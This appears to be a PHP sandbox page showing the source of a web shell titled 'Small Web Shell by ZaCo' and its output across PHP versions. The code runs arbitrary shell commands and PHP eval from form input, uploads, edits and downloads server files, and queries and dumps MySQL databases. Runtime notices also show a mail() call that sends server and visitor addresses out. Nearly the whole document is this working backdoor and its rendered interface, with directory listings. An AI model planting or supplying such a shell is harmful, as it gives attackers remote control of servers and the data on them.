$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value=' Notice: Undefined variable: e_work_dir in /in/avLYS on line 117 ' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=' Notice: Undefined variable: cmd in /in/avLYS on line 122 '> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value=' Notice: Undefined variable: e_work_dir in /in/avLYS on line 210 ' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value=' Notice: Undefined variable: user in /in/avLYS on line 447 '></td><td>Passwd :<input name='passwd' type=text value=' Notice: Undefined variable: passwd in /in/avLYS on line 447 '></td><td>Host :<input name='host' type=text value=' Notice: Undefined variable: host in /in/avLYS on line 447 '></td><td>DB :<input name='db' type=text value=' Notice: Undefined variable: db in /in/avLYS on line 447 '></td></tr> <tr><textarea name='query' cols=120 rows=20> Notice: Undefined variable: query in /in/avLYS on line 448 </textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value=' Notice: Undefined variable: db in /in/avLYS on line 453 '></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
Output for 7.3.33
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail(): Could not execute mail delivery program '/usr/sbin/sendmail -t -i' in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr><a href='#' onclick='document.list.work_dir.value="/.";document.list.submit();'><b>.</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/..";document.list.submit();'><b>..</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/bin";document.list.submit();'><b>bin</b></a> | rwxr-x--x 9994B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/boot";document.list.submit();'><b>boot</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/dev";document.list.submit();'><b>dev</b></a> | rwxr-xr-x 400B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/etc";document.list.submit();'><b>etc</b></a> | rwxr-xr-x 364B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/home";document.list.submit();'><b>home</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/in";document.list.submit();'><b>in</b></a> | rwxr-xr-x 80B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib";document.list.submit();'><b>lib</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib64";document.list.submit();'><b>lib64</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/mnt";document.list.submit();'><b>mnt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/opt";document.list.submit();'><b>opt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/proc";document.list.submit();'><b>proc</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/root";document.list.submit();'><b>root</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/run";document.list.submit();'><b>run</b></a> | rwxrwxrwx 80B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sbin";document.list.submit();'><b>sbin</b></a> | rwxr-x--x 9994B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/srv";document.list.submit();'><b>srv</b></a> | rwxr-xr-x 14B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sys";document.list.submit();'><b>sys</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/tmp";document.list.submit();'><b>tmp</b></a> | rwxrwxrwx 108400B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/usr";document.list.submit();'><b>usr</b></a> | rwxr-xr-x 70B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/var";document.list.submit();'><b>var</b></a> | rwxr-xr-x 96B Sep 10 2014 13:49:46 </pre><hr><form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form>
Output for 7.3.32
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail(): Could not execute mail delivery program '/usr/sbin/sendmail -t -i' in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr><a href='#' onclick='document.list.work_dir.value="/.";document.list.submit();'><b>.</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/..";document.list.submit();'><b>..</b></a> | rwxr-xr-x 126B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/bin";document.list.submit();'><b>bin</b></a> | rwxr-x--x 9954B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/boot";document.list.submit();'><b>boot</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/dev";document.list.submit();'><b>dev</b></a> | rwxr-xr-x 400B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/etc";document.list.submit();'><b>etc</b></a> | rwxr-xr-x 364B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/home";document.list.submit();'><b>home</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/in";document.list.submit();'><b>in</b></a> | rwxr-x--x 20B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib";document.list.submit();'><b>lib</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/lib64";document.list.submit();'><b>lib64</b></a> | rwxr-x--x 1294B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/mnt";document.list.submit();'><b>mnt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/opt";document.list.submit();'><b>opt</b></a> | rwxr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/proc";document.list.submit();'><b>proc</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/root";document.list.submit();'><b>root</b></a> | --------- 40B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/run";document.list.submit();'><b>run</b></a> | rwxrwxrwx 80B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sbin";document.list.submit();'><b>sbin</b></a> | rwxr-x--x 9954B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/srv";document.list.submit();'><b>srv</b></a> | rwxr-xr-x 14B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/sys";document.list.submit();'><b>sys</b></a> | r-xr-xr-x 0B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/tmp";document.list.submit();'><b>tmp</b></a> | rwxrwxrwx 111700B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/usr";document.list.submit();'><b>usr</b></a> | rwxr-xr-x 70B Sep 10 2014 13:49:46 <a href='#' onclick='document.list.work_dir.value="/var";document.list.submit();'><b>var</b></a> | rwxr-xr-x 96B Sep 10 2014 13:49:46 </pre><hr><form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form>
Output for 7.1.25, 7.2.0 - 7.2.13, 7.3.0 - 7.3.1
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 Warning: file_exists(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/tmp:/in:/etc) in /in/avLYS on line 107 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>/ Edit</strong><hr><pre> <form method=post> <textarea name='file_text' cols=120 rows=20>/ not exists</textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='/' size=120> <input name='f_action' value='save' type=submit> </form>
Output for 7.0.14 - 7.0.20, 7.1.0 - 7.1.7
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr>Error Listing /
Output for 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.25, 7.0.0 - 7.0.10
